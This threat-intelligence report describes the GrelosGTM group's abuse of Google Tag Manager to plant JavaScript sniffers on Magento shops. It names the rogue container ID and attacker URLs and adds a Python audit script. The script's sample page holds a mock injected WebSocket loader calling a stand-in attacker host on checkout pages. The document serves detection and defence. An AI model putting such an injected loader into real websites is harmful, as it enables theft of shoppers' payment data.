GrelosGTM group abuses Google Tag Manager to attack e-commerce websites
Threat Intelligence & Attribution analyst at Group-IB
Analysis of campaign
In their first attacks on e-commerce websites, this group used domains that impersonated legitimate services such as Google Analytics and Google Tag Manager. One year later, in April 2021, Group-IB specialists detected that, in addition to domains mimicking these services, the GrelosGTM group had started to abuse legitimate Google Tag Manager functionality for its own purposes when infecting online shops.
Analysis of attacks
This specific campaign started in February 2021 and affected at least seven websites running the Magento CMS in Belgium, Italy, the United Kingdom, and the United States. At the time of publication, the JS sniffer was still active on at least four websites. Group-IB Computer Emergency Response Team (CERT-GIB) has informed all of the infected websites of the incident.
For the initial stage of infection, the GrelosGTM group injected their own Google Tag Manager scripts into the source code of targeted websites. In most cases the attackers used a direct link to the script hosted on the legitimate googletagmanager.com domain, but in some infections they used an injector, as shown in Figure 1.
Figure 1: Example of the injected code: the Google Tag Manager container "GTM-5SF293J" was created by the attackers
This Google Tag Manager script (Figure 2) contains a malicious inject that loads the next-stage script from the attacker's website at hXXs://webfaset[.]com/str.css.
Figure 2: Google Tag Manager script with a malicious inject
The injected script detects the checkout page using a regular expression and then downloads the main JS sniffer payload over a WebSocket connection to wss://webfaset[.]com:80/bootstrap.min.css (Figure 3).
Figure 3: Fragment of the source code of WebSocket-based injector
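The infection chain above gives site operators two concrete things to check in their own page source: GTM container IDs they did not deploy, and WebSocket endpoints that should not be there. The following Python audit script is an added example, not code from the original post or from Group-IB; the sample HTML is constructed, the legitimate container ID "GTM-SHOP001" and the host "attacker-controlled.example" are placeholders, and only "GTM-5SF293J" comes from the post.

```python
import re

# Constructed sample page source (not from the original post): a Magento-style page
# carrying the shop's own GTM container plus a second, rogue one. GTM-5SF293J is the
# attacker-created container named in the post; the WebSocket host is a placeholder.
SAMPLE_HTML = """
<script>window.dataLayer = window.dataLayer || [];</script>
<script async src="https://www.googletagmanager.com/gtm.js?id=GTM-SHOP001"></script>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-5SF293J"></script>
<script>
if (/checkout/i.test(location.pathname)) {
  var ws = new WebSocket("wss://attacker-controlled.example:80/bootstrap.min.css");
}
</script>
"""

# GTM container ids look like GTM-XXXXXXX (uppercase letters and digits).
GTM_ID_RE = re.compile(r"GTM-[A-Z0-9]{4,}")
# Capture only the host part of any ws:// or wss:// URL found in the page.
WS_URL_RE = re.compile(r"""wss?://([A-Za-z0-9.-]+)(?::\d+)?[^"'\s]*""")


def find_gtm_containers(html):
    """Return the set of GTM container ids referenced anywhere in the page source."""
    return set(GTM_ID_RE.findall(html))


def find_websocket_hosts(html):
    """Return the set of hosts that the page opens WebSocket connections to."""
    return set(WS_URL_RE.findall(html))


def audit_page(html, allowed_containers, allowed_ws_hosts=frozenset()):
    """Flag GTM containers and WebSocket hosts that the shop owner did not deploy.

    Returns a sorted list of (finding_type, value) tuples; an empty list means clean.
    """
    findings = []
    for cid in sorted(find_gtm_containers(html) - set(allowed_containers)):
        findings.append(("unexpected_gtm_container", cid))
    for host in sorted(find_websocket_hosts(html) - set(allowed_ws_hosts)):
        findings.append(("unexpected_websocket_host", host))
    return findings


if __name__ == "__main__":
    # The shop knows it deployed only GTM-SHOP001 and uses no WebSockets on its pages.
    for kind, value in audit_page(SAMPLE_HTML, {"GTM-SHOP001"}):
        print(kind, value)
```

Run the audit against the rendered page as a browser sees it, not only the CMS templates, because the GTM container itself is what loads the next stage and its contents never appear in the shop's own files.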
Below you can find the MITRE ATT&CK mapping and the corresponding list of mitigations.